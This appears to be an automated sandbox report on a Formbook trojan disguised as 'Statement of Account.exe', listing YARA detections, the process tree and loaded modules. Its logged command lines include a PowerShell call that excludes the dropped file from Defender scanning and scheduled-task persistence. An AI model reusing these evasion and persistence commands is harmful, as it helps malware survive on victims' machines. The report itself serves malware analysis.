          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: vbc.exe PID: 3756, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: NETSTAT.EXE PID: 4608, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 7108, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SIZfuXT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, dHcwPaBtrBVw3QXCBV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.9250000.5.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.Statement of Account.exe.4214308.2.raw.unpack, dHcwPaBtrBVw3QXCBV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, dHcwPaBtrBVw3QXCBV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Statement of Account.exe.41a42e8.3.raw.unpack, FpK266NqdQHbcQlwv0.csSecurity API names: _0020.AddAccessRule
          Source: classification engineClassification label: mal100.troj.evad.winEXE@535/11@11/1
          Source: C:\Users\user\Desktop\Statement of Account.exeFile created: C:\Users\user\AppData\Roaming\SIZfuXT.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_03
          Source: C:\Users\user\Desktop\Statement of Account.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC2DD.tmpJump to behavior
          Source: Statement of Account.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Statement of Account.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Statement of Account.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Statement of Account.exeReversingLabs: Detection: 76%
          Source: C:\Users\user\Desktop\Statement of Account.exeFile read: C:\Users\user\Desktop\Statement of Account.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account.exe "C:\Users\user\Desktop\Statement of Account.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\SIZfuXT.exe C:\Users\user\AppData\Roaming\SIZfuXT.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"Jump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\Desktop\Statement of Account.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: iconcodecservice.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dll
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\Statement of Account.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Statement of Account.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Statement of Account.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Statement of Account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: ipconfig.pdb source: vbc.exe, 0000000C.00000002.1858338793.00000000052E7000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.1858179937.0000000005240000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000011.00000002.1861396265.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: explorer.exe, 00000007.00000002.4177672718.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4167058236.0000000003F7F000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4166685447.0000000003AF4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: netstat.pdbGCTL source: vbc.exe, 00000006.00000002.1797607492.00000000057A0000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000006.00000002.1797670992.00000000057B7000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.4164513188.0000000000C30000.00000040.80000000.00040000.00000000.sdmp
